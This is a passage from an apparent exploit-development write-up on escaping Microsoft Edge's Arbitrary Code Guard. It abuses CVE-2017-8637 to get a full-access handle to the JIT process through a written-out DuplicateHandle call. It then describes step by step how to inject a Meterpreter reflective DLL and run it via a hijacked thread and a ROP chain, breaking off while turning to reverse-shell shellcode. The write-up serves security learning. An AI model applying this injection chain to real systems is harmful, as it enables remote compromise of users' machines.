  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process “A” (the content process) to be used by process “B” (the JIT server), process “B” (the JIT server) first needs to give its handle to process “A” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires “a handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is number three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle. This is the exact scenario we currently have. Our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would allow us to have the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. The reason why CVE-2017-8637 is an ACG bypass is because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle) we would compromise the JIT process and execute code, because ACG isn’t enabled there!

So, we could setup a call to DuplicateHandle as such:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// Ignored since we later specify DUPLICATE_SAME_ACCESS
	0,			// FALSE (handle can't be inherited)
	DUPLICATE_SAME_ACCESS	// Create handle with same permissions as source handle (source handle = GetCurrentProcessHandle() so PROCESS_ALL_ACCESS permissions)
);

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - “A handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the “handle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - “The handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here. What this means is that we are asking DuplicateHandle to duplicate a pseudo handle to the current process. In other words, we are asking DuplicateHandle to duplicate us a PROCESS_ALL_ACCESS handle. However, since we have passed in the JIT server as the hSourceProcessHandle parameter we are instead asking DuplicateHandle to “duplicate us a pseudo handle for the current process”, but we have told DuplicateHandl that our “current process” is the JIT process as we have changed our “process context” by telling DuplicateHandle to perform this operation in context of the JIT process. Normally GetCurrentProcess would return us a handle to the process in which the function call occurred in (which, in our exploit, will obviously happen within a ROP chain in the content process). However, we use the “trick” up our sleeve, which is the leaked handle to the JIT server we have stored in the content process. When we supply this handle, we “trick” DuplicateHandle into essentially duplicating a PROCESS_ALL_ACCESS handle within the JIT process instead.
  3. hTargetProcessHandle - “A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit is executing within the content process so we tell DuplicateHandle that the process we want to receive this handle in context of is the current, or content process. This will allow the content process to use it later.
  4. lpTargetHandle - “A pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. Not only is this the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle. In our exploit we will just find an empty .data address to store it in), but the second part of the parameter description is equally as important. We know that for hSourceHandle we supplied a pseudo handle via GetCurrentProcess. This description essentially says that DuplicateHandle will convert this pseudo handle in hSourceHandle into a real handle when the function completes. As we mentioned, we are using a “trick” with our hSourceProcessHandle being the JIT server and our hSourceHandle being a pseudo handle. We, as mentioned, are telling Edge to search within the JIT process for a pseudo handle “to the current process”, which is the JIT process. However, a pseudo handle would really only be usable in context of the process where it was being obtained from. So, for instance, if we obtained a pseudo handle to the JIT process it would only be usable within the JIT process. This isn’t ideal, because our exploit is within the content process and any handle that is only usable within the JIT process itself is useless to us. However, since DuplicateHandle will convert the pseudo handle to a real handle, this real handle is usable by other processes. This essentially means our call to DuplicateHandle will provide us with an actual handle with PROCESS_ALL_ACCESS to the JIT server from another process (from the content process in our case).
  5. dwDesiredAccess - “The access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - “A variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t want to/nor do we care if this handle is inheritable.
  7. dwOptions - “Optional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the handle provided by the source. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle fulljitHandle will have a real PROCESS_ALL_ACCESS handle to the JIT server which can be used by the content process.

If this all sounds confusing, take a few moments to keep reading the above. Additionally, here is a summation of what I said:

  1. DuplicateHandle let’s you decide in what process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outline our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and “no child processes” are still in our way. We can’t just execute our payload because we can’t make our payload as executable. So, with that said, the first option one could take is using a pure data-only attack. We could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about a injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which we are attempting to do)?

This is actually prohibited (with a slight caveat). A process that is protected by ACG is not allowed to directly inject RWX memory and execute it within a process not protected by ACG. This makes sense, as this stipulation “protects” against an attacker compromising the JIT process (ACG disabled) from the content process (ACG enabled). However, we mentioned the stipulation is only that we cannot directly embed our shellcode as RWX memory and directly execute it via a process injection call stack like VirtualAllocEx (allocate RWX memory within the JIT process) -> WriteProcessMemory -> CreateRemoteThread (execute the RWX memory in the JIT process). However, there is a way we can bypass this stipulation.

Instead of directly allocating RWX memory within the JIT process (from the content process) we could instead just write a ROP chain into the JIT process. This doesn’t require RWX memory, and only requires RW memory. Then, if we could somehow hijack control-flow of the JIT process, we could have the JIT process execute our ROP chain. Since ACG is disabled in the JIT process, our ROP chain could mark our shellcode as RWX instead of directly doing it via VirtualAllocEx! Essentially, our ROP chain would just be a “traditional” one used to bypass DEP in the JIT process. This would allow us to bypass ACG! This is how our exploit chain would look:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process (this allows us to invoke memory operations on the JIT server from the content process)
  2. Allocate memory within the JIT process via VirtualAllocEx and the above handle
  3. Write our final shellcode (a reflective DLL from Meterpreter) into the allocation (our shellcode is now in the JIT process as RW)
  4. Create a thread within the JIT process via CreateRemoteThread, but create this thread as suspended so it doesn’t execute and have the start/entry point of our thread be a ret ROP gadget
  5. Dump the CONTEXT structure of the thread we just created (and now control) in the JIT process via GetThreadContext to retrieve its stack pointer (RSP)
  6. Use WriteProcessMemory to write the “final” ROP chain into the JIT process by leveraging the leaked stack pointer (RSP) of the thread we control in the JIT process from our call to GetThreadContext. Since we know where the stack is for our thread we created, from GetThreadContext, we can directly write a ROP chain to it with WriteProcessMemory and our handle to the JIT server. This ROP chain will mark our shellcode, which we already injected into the JIT process, as RWX (this ROP chain will work just like any traditional ROP chain that calls VirtualProtect)
  7. Update the instruction pointer of the thread we control to return into our ROP chains
  8. Call ResumeThread. This call will kick off execution of our thread, which has its entry point set to a return routine to start executing off of the stack, where our ROP chain is
  9. Our ROP chain will mark our shellcode as RWX and will jump to it and execute it

Lastly, I want to quickly point out the old Advanced Windows Exploitation syllabus from Offensive Security. After reading the steps outlined in this syllabus, I was able to formulate my aforementioned exploitation path off of the ground work laid here. As this blog post continues on, I will explain some of the things I thought would work at first and how the above exploitation path actually came to be. Although the syllabus I read was succinct and concise, I learned as I developing my exploit some additional things Control Flow Guard checks which led to many more ROP chains than I would have liked. As this blog post goes on, I will explain my thought process as to what I thought would work and what actually worked.

If the above steps seem a bit confusing - do not worry. We will dedicate a section to each concept in the rest of the blog post. You have gotten through a wall of text and, if you have made it to this point, you should have a general understanding of what we are trying to accomplish. Let’s now start implementing this into our exploit. We will start with our shellcode.

Shellcode

The first thing we need to decide is what kind of shellcode we want to execute. What we will do is store our shellcode in the .data section of chakra.dll within the content process. This is so we know its location when it comes time to inject it into the JIT process. So, before we begin our ROP chain, we need to load our shellcode into the content process so we can inject it into the JIT process. A typical example of a reverse shell, on Windows, is as follows:

  1. Create an instance of cmd.exe
  2. Using the socket library of the Windows API to put the I/O for cmd.exe on a socket, making the cmd.exe session remotely accessible over a network connection.

We can see this within the Metasploit Framework

Here is the issue - within Edge, we know there is a “no child processes” mitigation. Since a re